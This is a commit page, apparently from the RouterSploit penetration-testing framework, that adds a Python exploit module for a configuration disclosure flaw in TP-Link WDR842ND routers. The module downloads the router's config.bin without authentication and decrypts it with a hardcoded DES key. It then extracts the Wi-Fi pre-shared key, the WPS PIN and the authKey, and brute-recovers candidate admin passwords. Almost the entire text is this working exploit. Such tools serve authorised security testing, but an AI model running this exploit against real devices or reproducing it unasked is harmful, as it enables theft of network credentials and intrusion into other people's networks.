Commit bd407c63 by 菜猫 Committed by Marcin Bury

add wdr842nd_wdr842n_configure_disclosure (#287)

* add wdr842nd_wdr842n_configure_disclosure

* fix pep8

* fix pep8

* fix pep8

* fix logic error

* improve vulnerability verify

* put read_tp_config.py to exploit module

* pep8
parent 9d706265
from routersploit import (
exploits,
print_success,
print_error,
print_status,
http_request,
mute,
validators,
)
from Crypto.Cipher import DES
class Exploit(exploits.Exploit):
"""
Exploit implementation for TP-Link WDR842ND configure disclosure vulnerability.
If the target is vulnerable, it allows we fetch authKey,pskSecret,and .
"""
__info__ = {
'name': 'TP-Link WDR842ND configure Disclosure',
'description': 'Module exploits TP-Link WDR842ND configure disclosure vulnerability which allows fetching configure.',
'authors': [
'qingdaoxiaoge <qdpp007[at]outlook.com>', # vulnerability discovery
'VegetableCat <yes-reply[at]linux.com>', # routersploit module
],
'references': [
'http://cb.drops.wiki/bugs/wooyun-2015-0110062.html',
],
'devices': [
'TP-Link WDR842ND',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1',
validators=validators.url)
port = exploits.Option(80, 'Target Port')
def decrypt_authKey(self, authKey):
matrix = [[0 for i in xrange(15)] for i in range(15)]
passwdLen = 0
strDe = "RDpbLfCPsJZ7fiv"
dic = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW"
passwd = ''
for crIndex in xrange(0, 15):
passwdList = ''
strComp_authkey = authKey[crIndex]
codeCr = ord(strDe[crIndex])
for index in xrange(32, 127):
strtmp = chr(index)
codeCl = ord(strtmp[0])
strDic = dic[(codeCl ^ codeCr) % 255]
if strComp_authkey == strDic:
passwdList += strtmp
matrix[crIndex] = passwdList
for i in xrange(0, 15):
if len(matrix[i]) == 0:
passwdLen = i
break
elif i == 14:
passwdLen = 15
for i in xrange(0, passwdLen):
passwd += matrix[i] + '\n'
return passwd
def parse(self, data):
l = data.split('\r\n')
del l[0]
for item in l:
try:
if 'authKey' in item:
authKey = item.split()[1]
if 'cPskSecret' in item:
cPskSecret = item.split()[1]
if 'cUsrPIN' in item:
cUsrPIN = item.split()[1]
except:
pass
return authKey, cPskSecret, cUsrPIN
def decrypt_config_bin(self, data):
key = '\x47\x8D\xA5\x0B\xF9\xE3\xD2\xCF'
crypto = DES.new(key, DES.MODE_ECB)
data_decrypted = crypto.decrypt(data).rstrip('\0')
authKey, cPskSecret, cUsrPIN = self.parse(data_decrypted)
passwd = self.decrypt_authKey(authKey)
return passwd, authKey, cPskSecret, cUsrPIN
def run(self):
if self.check():
print_success("Target is vulnerable")
url = "{}:{}/config.bin".format(self.target, self.port)
print_status("Sending payload request")
response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200:
print_success("Exploit success")
print_status("Reading file config.bin")
password, authKey, cPskSecret, cUsrPIN = self.decrypt_config_bin(
response.content)
print_success("Found cPskSecret:" + cPskSecret)
print_success("Found cUsrPIN:" + cUsrPIN)
print_success("Found authKey:" + authKey)
print_success("Password combination from top to bottom:" + '\n' + password)
else:
print_error("Exploit failed. Device seems to be not vulnerable.")
@mute
def check(self):
url = "{}:{}/config.bin".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and 'x-bin/octet-stream' in response.headers['Content-Type']:
return True # target is vulnerable
else:
return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment